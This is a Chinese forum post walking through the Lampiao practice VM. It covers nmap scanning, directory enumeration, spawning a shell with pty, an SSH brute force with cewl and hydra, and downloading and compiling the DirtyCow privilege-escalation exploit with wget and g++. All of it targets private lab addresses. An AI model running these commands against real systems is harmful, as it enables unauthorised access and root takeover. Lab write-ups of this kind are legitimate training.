Lampiao靶场-dirtycow漏洞利用

打印 上一主题 下一主题

主题 704|帖子 704|积分 2112

Lampiao靶场-dirtycow漏洞利用


目录

只是简单记录一下所用工具
靶机信息:
靶机:192.168.142.132
攻击机:192.168.142.133
一、主机发现

nmap -sP 192.168.142.0/24
需要自己判断一下,哪台是靶机。
二、端口扫描

nmap -A -p- 192.168.142.132
进行端口扫描,获取端口信息,发现有22、80、1898端口开放
三、目录遍历

目录遍历可以使用dirb或者dirsearch工具
dirb http://192.168.142.133:1898

python3 dirsearch.py -u http://192.168.142.133:1898
个人感觉dirsearch比较速度更快
四、拿到webshell

这里就不写了,网上太多了。
五、实现交互式shell

python -c "import pty;pty.spawn('/bin/bash')"
其他方式参考大佬的文章,发现好东西就分享,我就不复制粘贴了。
https://saucer-man.com/information_security/233.html
六、暴力破解

因为有22端口,存在爆破的可能性,先收集一下网站信息做一个字典
cewl http://192.168.142.133:1898 -w lampiao.txt
用hydra进行ssh的暴力破解
hydra -l tiago -P lampiao.txt 192.168.142.133 ssh
补充:
-l后面加用户名,拿到交互式shell后可以查询一下/etc/passwd文件,自然可以拿到用户名。前期是拿不到其他用户名的,发现22端口开放也只能爆破root。
如果直接爆破root成功,恭喜你游戏结束。
七、把dirtycow脚本传到靶机

1、用python开启http服务
在攻击机上用python开启一个端口为3333的http服务
python -m http.server 3333
靶机用wget下载dirtycow脚本,当然有一些细节,需要自己去思考。
wget http://192.168.142.133:3333/40847.cpp
2、ssh服务传输文件
参考资料:
https://zhuanlan.zhihu.com/p/507876254
攻击机上运行:
rsync 40847.cpp tiago@192.168.142.132:/home/tiago
或者
靶机上运行:
rsync root@192.168.142.132:/root/桌面/40847.cpp .(.是代表当前路径)
八、编译运行dirtycow脚本

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

  • -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
  • -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
  • -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
  • -std=c++11就是用按C++2011标准来编译的
  • -pthread 在Linux中要用到多线程时,需要链接pthread库
  • -o dcow gcc生成的目标文件,名字为dcow
参考资料:
https://blog.csdn.net/weixin_43715506/article/details/113410027
https://blog.csdn.net/qq_42967398/article/details/102536576

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

曹旭辉

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表